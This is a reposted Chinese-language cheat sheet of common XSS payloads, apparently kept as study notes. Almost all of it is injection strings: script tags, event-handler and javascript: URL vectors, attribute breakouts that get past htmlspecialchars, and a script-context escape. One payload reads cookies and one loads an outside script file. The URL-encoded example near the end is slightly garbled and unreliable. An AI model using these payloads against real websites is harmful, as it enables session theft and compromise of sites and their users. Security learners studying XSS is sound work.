xss之常見payload


payload-有效載荷:

<script>alert(1)</script>                 #最普通的xss
<script>alert(document.cookie)</script>   #獲取cookie
<a href="javascript:alert('xss')">xss</a> #a鏈接的xss
<script src='http://baidu.com/xss.js'></script>   # 外部攻擊代碼
<img src=x onerror=alert(1)>              #加載圖形失敗執行
<iframe onload=alert('xss')>              #框架
<svg onload=alert(1)>
<video onloadstart=alert(1) src="/media/hack-the-planet.mp4" />
<body onload=alert(1)>
<style onload=alert(1)></style>
<input onmouseover=alert(1)>              (簡單防繞過)
#' onclick="alert(111)">                  (使用DOM型的xss)

xss之htmlspecialchars方法:
1) ' onclick='alert(111)'  
2) ' onmouseover='alert(1)
3) ' onmouseover='javascript:alert(1)'

xss之href輸出:(輸入的參數在herf標簽中,可以使用javascript協議來執行js)
javascript:alert(1)

xss之js輸出
lili'</script><script>alert("xss")</script>

對於GET和POST 方式的,隨便輸入,檢查在標簽<p>中,就可以直接用簡單的payload進行注入,如:
<script>alert(1)</script>  
<input onmouseover=alert(1)>  
<body onload=alert(1)>

URL編碼:
"onmouseover="61leralertt(11)      %22onmouseover%3D%2261leralertt(11)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2026 CODEPRJ.COM